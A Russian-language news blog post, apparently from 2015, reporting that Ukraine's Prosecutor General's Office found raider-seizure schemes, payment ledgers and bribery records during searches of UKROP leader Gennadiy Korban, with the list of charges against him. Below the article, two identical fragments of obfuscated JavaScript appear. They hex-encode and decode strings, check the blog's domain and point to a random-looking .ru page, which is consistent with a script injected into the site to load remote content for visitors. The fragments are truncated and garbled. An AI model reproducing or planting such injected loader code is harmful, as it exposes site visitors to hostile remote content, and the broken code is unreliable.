ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

Генпрокуратура нашла у Корбана схемы рейдерских захватов

Posted by operkor на Декабрь 29, 2015

3-1Во время обысков у лидера партии УКРОП Геннадия Корбана были изъяты схемы рейдерских захватов ряда предприятий, заявил на брифинге следователь главного следственного управления ГПУ по особо важным делам Николай Макеев. Сотрудники прокуратуры также показали слайды с отсканированными документами и опубликовали их на официальном сайте Генпрокуратуры.

В частности, в найденных бумагах упоминается проект «Чумаки». Макеев пояснил, что ГПУ расследует уголовное производство по факту рейдерского захвата предприятия с таким названием.

«Хлебзавод» – также был рейдерский захват этого предприятия преступной организацией под руководством Корбана. Там суммы, фамилии, график выплат, и даже подписи людей, которые получали эти суммы, все это в долларах», – отметил Макеев.

3-2

Также, по словам следователя, у организации есть проект «Заправки» на территории Днепропетровской области и не только. Там фигурирует фамилия «Филатов». В найденной табличке с распределением средств по этому проекту есть фамилии, в частности, Кошляк. Это человек, который находится под стражей по делу этой преступной организации» – подчеркнул Макеев.

3-3

Также в бумагах была ведомость по проекту «Вагоны», который связан с «захватом компании «Интерлизингинвест», пояснил Макеев.

Следователи подчеркнули, что показанные на брифинге бумаги – только маленькая часть обнаруженного, больше они показать не могут, поскольку досудебное следствие продолжается.

3-4

28 декабря Днепровский суд Киева изменил меру пресечения Корбану с домашнего ареста на содержание под стражей. Заседание суда продолжалось более суток – с 9.00 27 декабря до 14.00 28 декабря, для этого политика специально привезли в Киев из Днепропетровска. Ранее лидер УКРОПа находился под домашним арестом, срок которого истекал 30 декабря.

Корбана подозревают в похищении чиновника, присвоении и растрате имущества благотворительного «Фонда обороны страны», созданного для помощи бойцам АТО, незаконном завладении транспортным средством, а также в угрозах и насилии по отношению к членам избиркомов. Соратники Корбана, в том числе бизнесмен, бывший днепропетровский губернатор Игорь Коломойский, считают процесс над политиком политическими репрессиями.

http://gordonua.com

«По словам следователя, были найдены и изъяты черновые записи о перечислении средств в Фонд обороны страны, финансировании членов политической партии УКРОП, размещении заказных материалов в СМИ, оплате участия общественности в различных мероприятиях, финансировании избирательных кампаний и тому подобное. Также есть записи, где зафиксированы суммы выплат в качестве «заработных плат» работникам районных райотделов милиции, судьям районных судов г. Днепропетровска и других украинских судов за различные «услуги» вроде снятия арестов со счетов предприятий, контроль и сопровождение уголовных производств и тому подобное. Изъяты материалы, свидетельствующие о вынесении судами решений по заказу указанной преступной организации», — говорится в заявлении ГПУ.

Полный список статей, по которым Геннадию Корбану вручили подозрение:

  1. Создание и участие в преступной организации (ч. 1 ст. 255 УК Украины);
  2. Препятствование деятельности избирательных комиссий (ч. 3 ст. 157 УК Украины);
  3. Присвоение денежных средств в особо крупных размерах благотворительной организации «Фонд обороны страны» (ч. 5 ст. 191 УК Украины);
  4. Захват в г. Днепропетровске Председателя Госземагентства Украины и захвата в г. Днепропетровске директора Департамента Днепропетровского городского совета как заложников (ч. 2 ст. 289, ст. 349 УК).

Дополнительно прокуратура в производстве против политика исследует факты фиктивного предпринимательства (ч. 2 ст. 205 УК), легализации доходов, полученных преступных путем (ч. 2 ст. 209 УК) и уклонение от уплаты налогов (ч. 2 ст. 212 УК Украины). По ним обвинения не выдвигались.

http://ru.tsn.ua

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «operkor.wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e//ubnsyhv27fa2j.ru/f.html

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «operkor.wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e//ubnsyhv27fa2j.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: